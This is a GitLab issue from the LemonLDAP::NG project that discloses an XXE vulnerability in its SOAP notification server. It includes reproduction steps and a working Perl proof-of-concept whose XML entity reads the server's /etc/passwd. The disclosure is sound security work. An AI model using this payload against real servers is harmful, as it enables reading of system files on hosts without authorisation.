Skip to content
GitLab
Projects Groups Topics Snippets
  • /
  • Help
    • Help
    • Support
    • Community forum
    • Submit feedback
    • Contribute to GitLab
  • Sign in
  • lemonldap-ng lemonldap-ng
  • Project information
    • Project information
    • Activity
    • Labels
    • Members
  • Repository
    • Repository
    • Files
    • Commits
    • Branches
    • Tags
    • Contributor statistics
    • Graph
    • Compare revisions
  • Issues 357
    • Issues 357
    • List
    • Boards
    • Service Desk
    • Milestones
  • Merge requests 18
    • Merge requests 18
  • CI/CD
    • CI/CD
    • Pipelines
    • Jobs
    • Artifacts
    • Schedules
  • Deployments
    • Deployments
    • Environments
    • Releases
  • Packages and registries
    • Packages and registries
    • Container Registry
    • Model experiments
  • Monitor
    • Monitor
    • Incidents
  • Analytics
    • Analytics
    • Value stream
    • CI/CD
    • Repository
  • Snippets
    • Snippets
  • Activity
  • Graph
  • Create a new issue
  • Jobs
  • Commits
  • Issue Boards
Collapse sidebar
  • LemonLDAP NGLemonLDAP NG
  • lemonldap-nglemonldap-ng
  • Issues
  • #1818

[Security:low] XXE vulnerability in SOAP notification server

Note: due to #1819 (closed), this security issue is not exploitable because the server does not work for versions between 2.0.0 and 2.0.4. That's why it is tagged as "Security:low"

This vulnerability was found during a security by one of our users. I am merely a reporter this time, not the discoverer ;)

  • Activate the Notification server
  • Choose Old XML format
  • Run this script:
#!/usr/bin/perl
 
use SOAP::Lite;
use utf8;
 
my $lite = SOAP::Lite
        ->uri('urn:Lemonldap::NG::Common::PSGI::SOAPService')
        ->proxy('http://auth.example.com/notifications');
 
$r = $lite->newNotification('<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE root [  
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<notification uid="dwho" date="2019-06-26" reference="ABCD">
<text>&xxe;</text>
<text> You have been granted to access to appli-1 </text>
<text> You have been granted to access to appli-2 </text>
<check> I know that I can access to appli-1 </check>
<check> I know that I can access to appli-2 </check>
</notification>
</root>
');

if ( $r->fault ) {
        print STDERR "SOAP Error: " . $r->fault->{faultstring};
}
else {
        my $res = $r->result();
        print "$res notification(s) have been inserted\n";
}  
  • Login as dwho
  • Fix the templatesDir/templateDir typo in Notifications/XML.pm and login again ;)
  • Result:

image

(of course this is the server-side /etc/password that gets displayed, not client side)

This is a very low security impact on 2.0 because the templatesDir/templateDir typo makes SOAP Notifications unusable in 2.0 anyway in the current state, and REST is the default, and Notifications are not enabled by default, and the notification server should be filtered anyway.

However, users of old versions might be more exposed.

Edited Jun 26, 2019 by Yadd
Assignee
Assign to
Time tracking